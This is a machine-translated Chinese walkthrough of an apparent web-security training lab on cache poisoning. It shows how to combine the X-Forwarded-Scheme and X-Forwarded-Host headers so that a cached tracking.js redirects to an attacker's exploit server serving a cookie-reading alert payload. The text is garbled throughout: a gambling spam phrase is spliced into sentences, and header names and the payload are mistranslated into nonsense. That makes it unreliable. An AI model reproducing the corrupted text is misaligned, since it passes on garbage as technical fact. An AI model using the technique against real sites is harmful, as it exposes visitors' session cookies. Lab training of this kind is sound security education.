实验室:带beplay体育能用吗有多个标头的网络缓存中毒
从业者
这个实验室包含一个beplay体育能用吗网络缓存中毒只有在使用多个标头来制作恶意请求时才能利用脆弱性。用户大约每分钟访问主页一次。要解决这个实验室,请用执行的响应中毒缓存警报(Document.Cookie)
在访客的浏览器中。
解决方案
- 运行burp,加载网站的主页。beplay体育能用吗
- 转到“代理”>“ HTTP历史记录”,然后研究您生成的请求和响应。找出
得到
请求JavaScript文件/resources/js/tracking.js
并将其发送给Burp Repeater。
- 添加缓存查询参数和
X前主持人
带有任意主机名的标题,例如example.com
。请注意,这似乎对响应没有任何影响。
- 去除
X前主持人
标题并添加X前卫
标头。请注意,如果您包含其他任何值https
,您会收到302回复。这地点
标题显示您被重定向到您要求的相同URL,但使用https://
。
- 添加
X-Forwarded-Host:example.com
返回请求,但请保留X-Forwarded-Scheme:nothttps
也是。发送此请求,并注意地点
302重定向的标题现在指向https://example.com/
。
转到exploit服务器并更改文件名以匹配脆弱响应所使用的路径:
/resources/js/tracking.js
- 在身体中,输入有效载荷
警报(Document.Cookie)
并存储利用。
回到Burp Repeater中的请求,并设置X前主持人
标题如下,记住输入自己的利用服务器ID:
X-Forwarded主持人:Your-exploit-server-id.webbeplay体育能用吗-security-academy.net
- 确保
X前卫
标题设置为除了https
。
- 发送请求,直到您看到响应中反映的利用服务器URL,然后
X-CACHE:点击
在标题中。
- 要检查响应是否正确缓存,请右键单击“ BURP”中的请求,选择“复制URL”,然后将此URL加载到浏览器中。如果缓存成功中毒,您将看到包含有效载荷的脚本,
警报(Document.Cookie)
。请注意警报()
实际上不会在这里执行。
- 返回Burp Repeater,删除缓存加斯特,然后重新发送请求,直到您再次毒化缓存为止。
- 要模拟受害者,请在浏览器中重新加载主页,并确保
警报()
火。
- 继续重播要求将缓存中毒的请求,直到受害者访问该地点并解决了实验室。